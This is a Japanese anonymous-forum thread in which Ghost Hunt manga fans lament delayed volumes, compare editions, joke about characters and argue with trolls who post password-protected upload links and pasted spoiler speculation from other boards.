147 :花と名無しさん:2006/12/21(木) 16:06:26 ID:???O
馬鹿になるはずだな

148 :花と名無しさん:2006/12/21(木) 18:40:37 ID:???0
馬鹿になると読解力がなくなってどこかのアニメの監督みたいになります

149 :花と名無しさん:2006/12/21(木) 20:02:37 ID:???0
どこの監督かkwsk

このアニメの鬼火って人魂表現なんだね。マンガではちゃんと浮遊発光体のオーブでかかれてたのに。

150 :花と名無しさん:2006/12/21(木) 20:20:27 ID:???0
GHとかいうアニメの監督らしいです。

151 :花と名無しさん:2006/12/21(木) 20:31:39 ID:???0
本屋で平積みになってた単行本。そこについてた宣材のポールがよかった。
鎌子めちゃくちゃ目立ってるよ、いいよー、きれいだよ鎌子ーw

152 :花と名無しさん:2006/12/21(木) 22:30:54 ID:???0
つついてやると反撃してきます

153 :今日の嘘:2006/12/21(木) 23:49:40 ID:???0
アニメの2期と合わせて出したほうが良いと

ってかアニメが追いつくまで出さないでと言われたそうな

154 :花と名無しさん:2006/12/22(金) 13:21:28 ID:???0
な、なんだってー!!!(棒)

いや、ほんとに一瞬期待したw
名前欄見るまでは「どのくらい信用できるかな」とかwktkした

155 :花と名無しさん:2006/12/22(金) 17:01:53 ID:???0
>>153が本当になるように、祈祷の踊りを…ハラメーヤカオメーラ
でも正直あの話のクオリティで第2期やられても微妙だよね

156 :花と名無しさん:2006/12/22(金) 18:46:54 ID:???O
2期がありますように
新刊が出ますように
神アニメになりますように

ヲンヲリキリテイメイリテイメイワヤシマレイおこぶ(-人-)

157 :花と名無しさん:2006/12/22(金) 19:10:17 ID:???0
2期が見たかったらDVD買ってください。

158 :花と名無しさん:2006/12/23(土) 01:09:53 ID:???0
今のとこDVD買うほどにアヌメに心惹かれるものはないなあ。

159 :花と名無しさん:2006/12/23(土) 01:48:55 ID:???0
アニメ始まる前に、ひどい出来になるといっただろ。
おれ、もう見てないし。気が向いたらようつべで見るくらいで充分。

それよりも新刊マダー?

160 :花と名無しさん:2006/12/23(土) 05:41:41 ID:???0
それより新刊と原作の新装版を買いたい

161 :花と名無しさん:2006/12/23(土) 11:15:48 ID:???0
アニメようつべで放送分全部見たけど、そんなに悪くないと思ったよ
リボーン5話のせいで基準が低くなってるだけかもしれないけどw

今から揃えるなら漫画文庫版とコミックスどっちがいい?
文庫版って何かおまけとか収録されてるの?

162 :花と名無しさん:2006/12/23(土) 15:17:17 ID:???0
新書版にも 文庫版にも、それぞれ違った書下ろしがある。
新書版の8・9巻は文庫になっていないので、同じ版型で揃えたいなら
新書版をオススメする。
しかし文庫版にも書下ろしがあるし、装丁がカッコイイので、ファンなら
両方揃えて売り上げに貢献すると、いいことがある、かも。

アヌメはいらないけど、これが売れると刊行ペースがあがらないかなー、
と期待してるよ…しかし別に買いたくない…
ていうか原作は…

163 :花と名無しさん:2006/12/23(土) 15:35:07 ID:???O
>>162
新書版じゃなくね?

164 :花と名無しさん:2006/12/23(土) 16:20:32 ID:???0
普通のコミクスって新書判だよ?あのサイズを新書と呼ぶんだけど。

165 :花と名無しさん:2006/12/23(土) 17:36:20 ID:???O
ゴーストハントのコミックスのサイズ自体を勘違いしてた。
KCなかよしだったな。スマンかった

166 :161:2006/12/23(土) 20:55:39 ID:???0
>>162d
そっかどちらにも書下ろしがあるのか
とりあえずコミックスの方を揃えることにするわ
多分文庫版の方も揃えるけどw少しでも売り上げに貢献出来れば…

167 :花と名無しさん:2006/12/23(土) 21:25:46 ID:???O
恋人のいない俺はリアルサイレントクリスマス

168 :花と名無しさん:2006/12/23(土) 21:38:24 ID:???0
>>167
生`
俺なんて恋人も一人暮らしなので家族もいないうえに予備校に引き篭もって受験勉強なクリスマスだ
2ちゃんやってる時点でもうだめぽだが…

169 :花と名無しさん:2006/12/23(土) 22:06:42 ID:???0
W_ゝ`) <奇遇ですね、私もですよ

170 :今日の嘘:2006/12/23(土) 23:21:56 ID:???0
アニメ2期が終わったら

 主上書下ろし脚本で1話(2冊)出るって これはもう出来あがってる
 ナルがでてこないw 綾子と麻衣だけで温泉にいく話

だいぶ先の話やねしかし

171 :花と名無しさん:2006/12/24(日) 03:03:50 ID:???0
ttp://20a.mata-ri.tk/src/20M6593.lzh.html
事務所名 3文字

172 :花と名無しさん:2006/12/24(日) 03:12:10 ID:???O
>>171
ネタバレ

173 :花と名無しさん:2006/12/24(日) 03:20:44 ID:???0
晒し上げ

174 :花と名無しさん:2006/12/24(日) 12:14:34 ID:???0
久しぶりにGHの漫画読んだら面白くて新刊ないかなーと
探してみたんだがやっぱりまだ出てないんだな。
ずっと待ってるファンはつらいな。

ところで、自分も原作読んだ覚えがあるんだが、どうやって
手に入れて読んだのかさっぱり覚えてないんだよな。
図書館にはないし、オークションや本屋で見つからなかった記憶あるし、
友達に借りたにしては誰に借りたかも覚えてないという…。

ミステリ〜。

175 :花と名無しさん:2006/12/24(日) 12:34:14 ID:???0
アニメが終わるまでに新刊出ると良いな…

176 :花と名無しさん:2006/12/24(日) 12:38:08 ID:???0
>>174
こっくりさんに頼んだとかじゃないよな

177 :花と名無しさん:2006/12/24(日) 12:51:04 ID:???0
こっくりさんで一文字ずつ読むのか?すごいしんどいなw

178 :花と名無しさん:2006/12/24(日) 13:01:36 ID:???0
流石に全部読み終わる頃にはこっくりさんもすんなり帰ってくれことだろう

179 :花と名無しさん:2006/12/24(日) 13:15:19 ID:???0
祟る力も残ってないだろうなw

180 :花と名無しさん:2006/12/25(月) 00:41:09 ID:???0
ttp://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000179367.zip
パスmiyama

181 :花と名無しさん:2006/12/25(月) 17:43:52 ID:???0
W_ゝ`) <中庭迷路で捕まえて (4)
http://aa5.2ch.net/test/read.cgi/nanmin/1167030273/l50

182 :花と名無しさん:2006/12/25(月) 18:59:02 ID:???0
>>181ネタバレスレにて気をつけて〜

183 :花と名無しさん:2006/12/26(火) 02:36:51 ID:???O
W_ゝ`) <はい、ナル

184 :花と名無しさん:2006/12/26(火) 08:43:00 ID:???0
〃ルルヽ
c ´_ゝ`)<……

185 :花と名無しさん:2006/12/27(水) 02:04:01 ID:???O
>>174
昔は図書館にあったからそれ読んだのでは?

186 :花と名無しさん:2006/12/27(水) 19:13:53 ID:???0
http://vegetarianism.o0o0.jp/pochi/src/shichi21390.lzh.html
パス「shibuya」

187 :花と名無しさん:2006/12/28(木) 19:38:37 ID:???0
http://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000180256.zip
パス「sage」

188 :花と名無しさん:2006/12/28(木) 19:50:12 ID:???0
http://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000180258.zip
パス「sage」

189 :花と名無しさん:2006/12/28(木) 20:20:23 ID:???0
過疎ってるとはいえ他スレの退避で使わないで欲しい。
DLできないので余計悔しい。

190 :花と名無しさん:2006/12/28(木) 20:31:08 ID:???0
退避??

191 :花と名無しさん:2006/12/28(木) 20:31:51 ID:???0
単なる荒らし

192 :花と名無しさん:2006/12/28(木) 20:33:50 ID:???0
新刊さえ出れば…新刊さえ出ればここにも人が戻ってくるに違いないんだ!
ラストまでもう全部描いてあって、アニメ終了に合わせて
2月3月と連続で刊行とかにならないだろうか…

193 :花と名無しさん:2006/12/28(木) 21:26:56 ID:???0
>>189
A courtyard alliance 5
http://ex13.2ch.net/test/read.cgi/nanmin/1167266767/l50
で貰え。

194 :花と名無しさん:2006/12/28(木) 21:42:06 ID:???0
いなださん描いているのかなあ。
消えた予定では、もう発売されてる頃だっけ?

195 :花と名無しさん:2006/12/28(木) 21:45:04 ID:???0
>>194
確か今日の予定だったよね。

196 :花と名無しさん:2006/12/28(木) 21:47:57 ID:???O
WД`)

197 :花と名無しさん:2006/12/28(木) 21:57:58 ID:???0
コミック、文庫、廉価、アニメときたら次はカラー原稿掲載の豪華装飾本でしょ。

198 :花と名無しさん:2006/12/29(金) 08:55:22 ID:???0
その前に、とりあえずフィギュア付きの限定版コミックスでしょ。
オコブ様の・・・ってネタは既出か。

199 :花と名無しさん:2006/12/29(金) 09:11:23 ID:???O
電動おこぶさま

200 :花と名無しさん:2006/12/29(金) 15:11:45 ID:???0
血液の香りつきウラドストラップ

201 :花と名無しさん:2006/12/29(金) 15:21:13 ID:???0
鉄錆と塩の香り…

202 :花と名無しさん:2006/12/29(金) 17:29:15 ID:???O
これであなたもお肌すべすべ、血液の湯

203 :花と名無しさん:2006/12/29(金) 17:45:50 ID:???0
長寿の湯

204 :花と名無しさん:2006/12/29(金) 19:20:08 ID:???0
>>195
そうか…本当なら昨日新刊が…新刊が…

205 :花と名無しさん:2006/12/29(金) 23:17:34 ID:???0
思い出させるなー
きっと、いつかの春にはいつかの春には…春に…春春はるはr

206 :花と名無しさん:2006/12/29(金) 23:34:02 ID:???0
>>205が一足先に春を体感してしまったようだww

207 :花と名無しさん:2006/12/29(金) 23:36:34 ID:???0
春というよりも極寒な気が

208 :花と名無しさん:2006/12/30(土) 01:01:02 ID:???0
http://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000180660.zip
「20061230」

209 :花と名無しさん:2006/12/30(土) 15:00:00 ID:???0
このスレに必要なのは、春じゃなくナルだ。

210 :花と名無しさん:2006/12/30(土) 17:06:42 ID:???0
だれがうまそうなことを(ry

211 :花と名無しさん:2006/12/30(土) 21:32:26 ID:???0
でも今年は一応新刊も出たし良い年だったね…!
来年も新刊の出る良い年になるといい!

212 :花と名無しさん:2006/12/30(土) 22:30:00 ID:???0
難民スレです。次スレが立ちました。
six
http://ex13.2ch.net/test/read.cgi/nanmin/1167485136/l50

213 :花と名無しさん:2006/12/31(日) 02:17:58 ID:???0
421 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:13:31
>>416
つうか失踪者の大半は、性的暴行に関係がありますってのは
ちょっと乱暴な意見じゃないの?
それともアメリカじゃそうなのかな


422 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:13:38
>>411
やおいってはじめに言ってるから麻衣は違う気がする


423 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:13:53
>>418
私もわからんw
受けに回って、あまり想像のつかない人…

安原さん?w

214 :花と名無しさん:2006/12/31(日) 02:18:59 ID:???0
434 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:18:09
>>422
その部分はやおいとかやおいじゃなしに、単に受け攻めの話題だと思う

てーか、ヤオイだと攻めなナルはあんましっくりこないけど、ノーマルだと
まあ普通はナルが攻めなのよねーって文脈では。

215 :花と名無しさん:2006/12/31(日) 02:20:32 ID:???0
437 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:19:53
××・××で、××受だとスゴイカップリング…

麻衣リン?w
というのは冗談で、坊主リンとかかなあ?

216 :花と名無しさん:2006/12/31(日) 02:25:59 ID:???0
801はBBSPINKでお願い

217 :花と名無しさん:2006/12/31(日) 02:28:20 ID:???0
447 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:26:45
13pを自分なりに考えてみたんだが、

失踪者の<捜索(捜査)>にも係わっている〜

普通、<失踪者>の大半は、<殺人事件>に〜

<殺人>の場合、被害者との<同調>が激しい〜

<レイプ>とか、自分のことの〜




448 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:26:46
あー15pに進めないほうがいいのかなー


449 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:27:25
違った、14pだ。
こっちのほうがよくわかんなくて気になるんだよね

218 :花と名無しさん:2006/12/31(日) 02:38:59 ID:???0
464 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:38:23
15p
精神的外傷、せくす、ナル、やおい、
同性、レイプ、同性、ゲイ、ゲイ、ナル、ゲイ、
ナル、麻衣、同性、レイプ、同性、レイプ

やな呪文だなw

『××××××××』はなんだろう、ヘイキだと「!」が余るし

219 :花と名無しさん:2006/12/31(日) 02:44:21 ID:???0
469 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:43:44
>>464
夢の中のナルが別人だったって意味のことかなと思ったんだけど
良くも悪くもあれがネックだったんだろ

220 :花と名無しさん:2006/12/31(日) 02:56:08 ID:???0
473 名前:名無し草 本日のレス 投稿日:2006/12/31(日) 02:48:14
>>469
ナルは異性に性的欲求を感じない。レイプ経験ありだから。
けど麻衣はジーンに似てたから、多少は大丈夫な気がした。
でも結局麻衣はジーンが好き。ナル振られんぼ。でおk?

221 :花と名無しさん:2006/12/31(日) 02:58:31 ID:???0
振られんぼという表現がババくさい

222 :花と名無しさん:2006/12/31(日) 03:17:08 ID:???0
わざわざ誤解させる部分だけ貼り出してるなあ
荒らしってキモイ

223 :花と名無しさん:2006/12/31(日) 04:28:02 ID:???0
庭避難所
http://dso.2ch.net/test/read.cgi/yangon/1167505223/

224 :花と名無しさん:2006/12/31(日) 04:36:59 ID:???0
庭避難所
http://ex13.2ch.net/test/read.cgi/neet4vip/1167507089/

225 :花と名無しさん:2006/12/31(日) 04:41:14 ID:???0
http://ex17.2ch.net/test/read.cgi/news4vip/1167507517/l50


226 :花と名無しさん:2006/12/31(日) 05:02:17 ID:???0
本スレはここです。
six
http://ex13.2ch.net/test/read.cgi/nanmin/1167485136/l50

227 :花と名無しさん:2006/12/31(日) 15:13:18 ID:???0
......なんですのこれは.......

こんなにひどい誘導屋敷を見たのははじめてですわ

228 :花と名無しさん:2006/12/31(日) 20:00:43 ID:???0
ナルも言ってるじゃ無いか

豚に説教しても意味が無いんだよ
放置汁

229 :花と名無しさん:2006/12/31(日) 23:06:11 ID:???0
ぜひ来年も新刊が出ますようにー

230 :花と名無しさん:2007/01/01(月) 01:01:16 ID:???0
文庫本の5巻なら出る

231 : 【大吉】   【1852円】 :2007/01/01(月) 01:30:08 ID:???0
10巻出ますように祈願。
今年の新刊の運命は…

232 :231:2007/01/01(月) 01:32:08 ID:???0
幸先イイ! ヽ(´∀`)ノ

233 : 【だん吉】 :2007/01/01(月) 01:35:52 ID:???O
W_ゝ`)<私の運勢は……

234 : 【大吉】   【757円】 :2007/01/01(月) 01:52:10 ID:???0
アケオメ!

235 : 【凶】 【1783円】 :2007/01/01(月) 15:25:04 ID:???0
あけましておめでとうございます。
今年は新刊が出ますように!

236 :omikuji! dama!:2007/01/01(月) 15:35:54 ID:???0
新刊でるかなぁ・・・・

237 : 【ぴょん吉】 【1123円】 :2007/01/01(月) 17:43:53 ID:???0
!omikuji!dama

238 :麻衣の時給→ 【1275円】 【小吉】 :2007/01/01(月) 17:50:34 ID:???0
あけおめ〜

239 :花と名無しさん:2007/01/01(月) 19:42:05 ID:???0
時給いいな麻衣w

240 :リンさんの時給→ 【654円】 【ぴょん吉】 :2007/01/01(月) 21:06:41 ID:???0
あけおめ

241 :花と名無しさん:2007/01/01(月) 21:52:33 ID:???0
麻衣はそこらのOLくらいもらってるらしいから妥当かもしれんな

リンさん…(ノД`)

242 :花と名無しさん:2007/01/01(月) 23:44:15 ID:???0
リンさん・・・高校生のコンビニバイトだってもっともらえてる

243 :花と名無しさん:2007/01/02(火) 04:44:52 ID:???0
http://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000181466.zip

244 :花と名無しさん:2007/01/02(火) 21:04:42 ID:???0
>>240
リンさん…

245 :花と名無しさん:2007/01/03(水) 03:51:42 ID:???0
patio蜂
http://ex13.2ch.net/test/read.cgi/neet4vip/1167763804/l50
己 奈々スレ目
http://etc5.2ch.net/test/read.cgi/siberia/1167763458/l50

246 :花と名無しさん:2007/01/03(水) 03:56:38 ID:???0
庭7
http://ex13.2ch.net/test/read.cgi/nanmin/1167764085/l50

247 :花と名無しさん:2007/01/03(水) 19:43:52 ID:???0
ナルのクローゼットはやはり真っ黒なのかな?なるだって休日にはチェックのシャツにケミカルウォッシュのデニムはいて
アキバでマニアな部品をチェックしてるに違いない。

248 :花と名無しさん:2007/01/03(水) 19:46:25 ID:???0
いや黒ばっかだよ

249 :花と名無しさん:2007/01/03(水) 19:47:54 ID:???0
庭7
http://ex13.2ch.net/test/read.cgi/nanmin/1167764085/l50
が本スレです。>>245のスレには書き込まないように注意して下さい。

250 :花と名無しさん:2007/01/03(水) 21:00:24 ID:???0
>>248

みたんか??www

251 :花と名無しさん:2007/01/03(水) 21:03:52 ID:???0
まさか下g(ry

252 :花と名無しさん:2007/01/03(水) 21:16:49 ID:???0
>>250
いや読んだ

253 :花と名無しさん:2007/01/03(水) 21:25:47 ID:???O
休日はアニメキャラのTシャツにケミカルウォッシュのジーンズでリュックサックなナルに萌え

254 :花と名無しさん:2007/01/03(水) 21:41:33 ID:???0
ナルの知識と頭脳に裏づけされたヲタっぷりはアニヲタとは格が違う。
しかし、どんなにヲタでもナルがキンモーと言われることはない。
人間、見た目が全て。

255 :花と名無しさん:2007/01/03(水) 21:50:46 ID:???0
ナルがロリアニヲタだったらキンモーって言うよw
見た目は重要だがそれを凌駕して余りあるキモさっつーのはある。

256 :花と名無しさん:2007/01/03(水) 22:52:50 ID:???0
別にロリオタだというだけでキンモーとは言わない。
行動がキモかったらキモいと言うが。

でもナルは素でちょっとキモいところはあるお

257 :花と名無しさん:2007/01/04(木) 02:58:31 ID:???0
白泉のサイトでしばわんこの壁紙欲しさにアンケートやってきたら、
「好きなコミックス」とあったので幻影奇譚と書いてきた。
ついでに「未収録物が読みたい」とねだってきた。
今でも待ってるんだよ読みたいんだよぉぉぉ!。・゚・(ノД`)・゚・。

258 :花と名無しさん:2007/01/04(木) 09:08:01 ID:???O
GJです。
地道な応援がいつか…
きっといつか…

259 :花と名無しさん:2007/01/04(木) 12:46:25 ID:???0
幻影奇憚また連載してくれないかな

260 :花と名無しさん:2007/01/05(金) 01:35:34 ID:???0
43 :名前書いたら負けかなと思っている。:2007/01/05(日) 00:27:13 ID:GIBZyHp50
ナルはゲイなんですか?

261 :花と名無しさん:2007/01/05(金) 16:24:53 ID:???O
>>256
女に全く興味なさそうなところとかな。

262 :花と名無しさん:2007/01/05(金) 17:13:38 ID:???0
まておまいら、ナルはまだ17だろ。け、女なんてとむっつりするのがかっこいいと思うやつだっている年代。
ほんとは興味あるのに突っ張ってるのかもしれん。
年中エロババアの色目に晒されて女性不信とかな。

263 :花と名無しさん:2007/01/05(金) 18:19:17 ID:???0
winplus.jp003.zip 10人

264 :花と名無しさん:2007/01/05(金) 21:07:50 ID:???O
そうして興味ない振りをして、そのまま童貞な俺が通りますよ。
(´д⊂)

265 :花と名無しさん:2007/01/05(金) 22:46:53 ID:???0
大掃除の時に溜まりにたまったlala(1×年分)を片付けていたら、
習子さんの漫画講座が出てきた!
幻影奇譚も二つあった! ハッタレも見つけた!
やっぱりいなださんの漫画好きだー。
もっと読みたいから白泉アンケ行ってこよ…。

266 :花と名無しさん:2007/01/05(金) 23:42:18 ID:???0
すげぇお宝だ!w
もちろん未収録だよね?大事にしなされ

267 :花と名無しさん:2007/01/05(金) 23:46:10 ID:???0
うpキボン

268 :花と名無しさん:2007/01/06(土) 00:11:49 ID:???0
>>265
自慢乙

269 :花と名無しさん:2007/01/06(土) 00:14:14 ID:???0
やっかみ乙

270 :花と名無しさん:2007/01/06(土) 00:24:20 ID:???0
>>269
ハイハイ( ´,_ゝ`)プッ

271 :265:2007/01/06(土) 18:17:01 ID:???0
コミックスになりようがないもののうpってどうなんだろう?
でも見つけて嬉しかったので習子さんの初回をおすそ分け。
携帯カメラの画像悪くてごめんね。ふいんき(ryを楽しんで。つーかだれかスキャナー買ってw

upload20000027010.jpg
パスは雅女也がこっそり飼っていた虫w

272 :花と名無しさん:2007/01/06(土) 18:59:02 ID:???0
>>271
生をコピーさせてくれるならうちのあまってるA4スキャナーをただであげよう。ただし、完動品だが4年落ちだ。
でも、話の流れで何か貴重な感じがしてるだけで習子さんの漫画講座も幻影奇譚も意味がわかんないんだけどさ。

273 :花と名無しさん:2007/01/06(土) 19:40:24 ID:???0
うpるならニー速のpatioスレでキボンヌ

274 :花と名無しさん:2007/01/06(土) 19:53:53 ID:???0
>>273
氏ね

275 :花と名無しさん:2007/01/06(土) 22:40:46 ID:???0
自宅のごみ箱に仲良し付録の麻衣の「チェック!」というシールが未だ貼られてます

276 :花と名無しさん:2007/01/07(日) 01:18:28 ID:???0
ttp://www.uploda.net/cgi/uploader1/index.php?dlpas_id=0000181701.zip
パスはエッセイ

277 :花と名無しさん:2007/01/08(月) 00:20:22 ID:???0
退避スレにされてからめっぽう過疎って、いまや廃村だよ。

278 :花と名無しさん:2007/01/08(月) 00:33:06 ID:???0
退避スレにされてから>いつされた?されてねーだろ?

279 :花と名無しさん:2007/01/08(月) 00:34:07 ID:???0
難民の誤爆じゃね?

280 :花と名無しさん:2007/01/08(月) 01:11:55 ID:???0
どうせ>>277=>>189だろ?
ただの馬鹿。


281 :花と名無しさん:2007/01/08(月) 02:33:42 ID:???0
このスレにはいったいなにが起きているの?

282 :花と名無しさん:2007/01/08(月) 02:35:41 ID:???0
>>281
何も起きてなどいませんが?

283 :花と名無しさん:2007/01/08(月) 02:41:19 ID:???0
アニメ化なんてしなければ良かったのに………………………………

284 :花と名無しさん:2007/01/08(月) 02:47:15 ID:???0
アニメ化されなければ、ここまで荒らしが遠征してこなかったよね…
バレスレも出来なかったろうしさ…

285 :花と名無しさん:2007/01/08(月) 02:49:00 ID:???0
文庫版5巻発売ケテーイ。
また、撤回しないことを祈る。

286 :花と名無しさん:2007/01/08(月) 03:03:00 ID:???0
>>285
そんなもんより10巻出せよ

287 :花と名無しさん:2007/01/08(月) 03:07:01 ID:???0
私に言われても…

288 :花と名無しさん:2007/01/08(月) 03:42:59 ID:???0
アニメつまんないし、はやくおわんないかな

289 :花と名無しさん:2007/01/08(月) 08:13:38 ID:???0
>>279
誤爆とはスレや板を間違えてレスつけることだろ。

278は引用符の使い方間違えてるし、難民も疎開先では単なる荒らし。

290 :花と名無しさん:2007/01/08(月) 08:23:13 ID:???O
5巻の表紙はまたナルと麻衣なのかな

291 :花と名無しさん:2007/01/08(月) 11:44:32 ID:???0
つか今漫画はどのあたりだっけか

292 :花と名無しさん:2007/01/08(月) 11:52:42 ID:???O
おこぶさまが終わった

293 :花と名無しさん:2007/01/08(月) 12:25:37 ID:???0
いなださんて今GH以外に何か漫画の仕事をしてるの?
なんでこんなに発行が遅れるんだろう…

294 :花と名無しさん:2007/01/08(月) 12:27:50 ID:???0
>>289
引用符云々の意味が本気で分からないんだけど…?

> >>279
> 誤爆とはスレや板を間違えてレスつけることだろ。
>
> 278は引用符の使い方間違えてるし、難民も疎開先では単なる荒らし。

の方でやれってこと?2ちゃんでだと、このやり方はやらなくないか…?
だいたい>>279みたく使ってるよね?まあどうでもいいけど。
それに、ここは難民の荒らしが荒らしてるだけで、(単にとばっちりを受けただけ)
退避スレなんかには使われて無いよ。
あっちでうp出来ないから、ここでやってるみたく勘違いしてる人が
一人いるみたいだけどね。

295 :花と名無しさん:2007/01/08(月) 12:34:34 ID:???0
ついでにいっとくと、難民の庭スレも退避スレになんかなってないよ。

アニメつまらないし、新刊と小説再販が出る訳でも無いし、
アニメ化なんてしなければよかったのに…

296 :花と名無しさん:2007/01/08(月) 12:54:19 ID:???0
>>289>>278の言い方にカチンときた気持ちも分からなくはないけど、
引用符にまでつっかかるか?
それに、退避スレにされたGH関連スレなんてないと思う。
あっ、ヤンゴンがあったかw
つーか、関連スレ立ちすぎだよね…。
これじゃ、分散して人も減るよ。


297 :花と名無しさん:2007/01/08(月) 13:01:43 ID:???0
TH版の最後のエピソードを残すのみです

298 :297:2007/01/08(月) 13:02:56 ID:???0
>>291宛て
遅レスの上、アンカー忘れた

299 :花と名無しさん:2007/01/08(月) 13:04:52 ID:???0
文庫5巻ってマジ?
なんかこのまま漫画もヘイキ!は無しになりそうな悪寒。

300 :花と名無しさん:2007/01/08(月) 16:40:32 ID:???0
すべてアニメ化が悪いでFA?

301 :花と名無しさん:2007/01/08(月) 17:08:44 ID:???0
良い事も生み出したと思う。

302 :花と名無しさん:2007/01/08(月) 17:09:26 ID:???0
ゴーストハント漫画化の前からいなださんと主上双方のファンだった
自分にはいいこともあったんだけどね。
アニメ化でバレについて話せる場所もできたし、全てが悪いとは思えないや。
まぁ、ここが荒れるのは心底勘弁してほしいですが。

303 :花と名無しさん:2007/01/08(月) 17:16:46 ID:???0
アニメ化がなければ、バレスレも出来なかったし、中庭も読めなかったから
それだけは良かったけど、庭スレの荒らしの出張には閉口。
アニメ化無しで、いなださんに早く続き描いて貰って終了して、
懐漫板あたりでバレ有りで語れたら良かったかなぁ。
アニメ化してなくても、(漫画版終了後に)うpがあった時点で
荒れたかもしれないから、何とも言えないんだけどね。


304 :花と名無しさん:2007/01/08(月) 18:41:58 ID:???0
79 :名前書いたら負けかなと思っている。:2007/01/08(日) 18:27:53 ID:MqWNgSCF0
すみません、ちょっと場所借りますね。
winplus.jp003.rar パスは五月十七日の行事

305 :花と名無しさん:2007/01/08(月) 19:39:37 ID:???0
別にアニメは何も悪くない
むしろ続きを描かないいなださんのが悪い

306 :花と名無しさん:2007/01/08(月) 19:52:01 ID:???0
305みたいなのや主上に凸したようなのが
いなださんに対しても同じようなことして描けなくなったのだろうかと
アニメ化して主上信者のカキコ(同人を槍玉にあげたり単行本イラ以外認めない的)
をGH関連で見るようになってから感じるようになった

いなださん頑張ってGH終わらせて、またオリジナルを読ませてください(祈)

307 :花と名無しさん:2007/01/08(月) 20:25:17 ID:???0
ちょっといくらなんでも盲目的すぎるぞ

308 :花と名無しさん:2007/01/09(火) 00:05:50 ID:???0
アニメ化してよかったのはリンさん専スレが出来たことさ〜

309 :花と名無しさん:2007/01/09(火) 00:09:39 ID:???0
みんな、リンさんとおこぶ様とヴラド好きだね〜w

310 :花と名無しさん:2007/01/09(火) 01:08:10 ID:???0
 

311 :花と名無しさん:2007/01/09(火) 12:35:02 ID:???O
おこぶ様専用スレはあるの?

312 :花と名無しさん:2007/01/09(火) 12:35:54 ID:???O
ないでしょ

313 :花と名無しさん:2007/01/09(火) 13:03:52 ID:???0
>>311-312
自演乙


314 :花と名無しさん:2007/01/09(火) 16:28:53 ID:???0
アニメ始まる前は313みたいなやつはここにいなかった。

315 :花と名無しさん:2007/01/09(火) 16:58:45 ID:???0
今から1時間以内にレスがなければおこぶ様は私のもの

316 :花と名無しさん:2007/01/09(火) 17:52:38 ID:???0
>>314
どっちもケータイからだし、時間見ても自演だと思うよ。
まあどうでもいいけどね。

317 :花と名無しさん:2007/01/09(火) 17:58:33 ID:???0
自演乙とか、人にちょっとしたことで絡む人が増えたな〜とは自分も思う。
アニメ化したからよりは、難民からの流れて来て居ついてるだけの気がするけど。

>>315
おこぶさまは私が貰った。
君には浦戸をあげようw

318 :花と名無しさん:2007/01/09(火) 18:38:53 ID:???0
悪霊しか読んでなかった私には坊さんがかっこよすぎてニヤニヤしてしまう(・∀・)
ナルやリンさんもWH版のデザインからとっているのね
コミックス今は止まってるようだが
あの大好きなシーンをどう料理してくれるかwktkして待ってるよ

319 :花と名無しさん:2007/01/09(火) 20:34:07 ID:???O
>>316
>>312は自分だけど、自演ではない。だいたい、あんなの自演する意味が分からん。

320 :花と名無しさん:2007/01/09(火) 21:37:42 ID:???0
おこぶも浦戸もあげるよ。
林さんだけはわたしのもの。

321 :花と名無しさん:2007/01/09(火) 21:49:37 ID:???0
>>317

間違えるな、おこぶ様は自分を慰めるために使う道具ではないぞ

322 :花と名無しさん:2007/01/10(水) 03:06:22 ID:???0
安原ラブのメガネ萌えっ子、恥ずかしがらずに手を上げよ。

323 :花と名無しさん:2007/01/10(水) 05:29:01 ID:???O
最近の流行は血も滴るいい男

324 :花と名無しさん:2007/01/10(水) 06:43:08 ID:???0
>>323
それまんま浦戸タンのことじゃw

>>320
リンさんはおいらのだーーー
麻衣にビクつく多少ヘタレっぽいところがたまらん
ワイシャツの背中に(*´Д`)ハァハァw

325 :花と名無しさん:2007/01/10(水) 15:51:40 ID:???0
ぼーさんはもらって行きますね

326 :花と名無しさん:2007/01/10(水) 18:11:27 ID:???O
ジョンはこっそりいただいた

327 :花と名無しさん:2007/01/10(水) 22:28:03 ID:???0
おれは麻衣と結婚する
結婚できないなら死ぬ

328 :花と名無しさん:2007/01/10(水) 23:05:48 ID:???0
>>327
じゃあ死になさい

329 :花と名無しさん:2007/01/10(水) 23:07:15 ID:???0
>>327
それ、はやってるの?

330 :花と名無しさん:2007/01/13(土) 18:04:30 ID:???0
>>329
ありきたりなフレーズだからな

331 :花と名無しさん:2007/01/14(日) 03:06:35 ID:???0
ドーナツ座布団、はじめて使ってみたが、かなりイイ(゚∀゚)

332 :花と名無しさん:2007/01/14(日) 12:53:19 ID:???O
お逝きなさいってあったけど、もう結構前になるんかね

333 :花と名無しさん:2007/01/15(月) 18:12:56 ID:???O
W_ゝ`)<こちらの世界へようこそ>>331さん

334 :花と名無しさん:2007/01/17(水) 02:07:53 ID:???O
中庭のうpってもうやってくれないのかな……?
乗り遅れた……orz

335 :花と名無しさん:2007/01/17(水) 02:18:50 ID:???0
>>334
気持ちはわかるけどここで聞くなよ…。
うpの件では散々このスレも迷惑被ってんだからさ
ここでそれを訊くのは荒らしと同じだと思うよ

336 :花と名無しさん:2007/01/17(水) 08:19:11 ID:???0
春までには10巻読みたいなぁ・・・
陰ながら応援してるのでいなださんガンガレ

337 :花と名無しさん:2007/01/17(水) 14:07:02 ID:???0
前回の新刊からもうすぐ一年なんだね
あと3ヶ月弱でGHアニメも終わっちゃうけど、
放送中に10巻が出る事をまだ諦めてないよ( ゚∀゚o彡°

無理か…

338 :花と名無しさん:2007/01/17(水) 14:28:55 ID:???0
DVDの4コマで忙しいんですか
コミックスはまだですか

339 :花と名無しさん:2007/01/17(水) 15:42:11 ID:???0
あと3ヶ月もやるの?まじおこぶ様までやるの??

340 :花と名無しさん:2007/01/17(水) 18:52:34 ID:???0
アニメはおこぶ様で終わりって聞いたけど
漫画はちゃんと最後までやってほしい

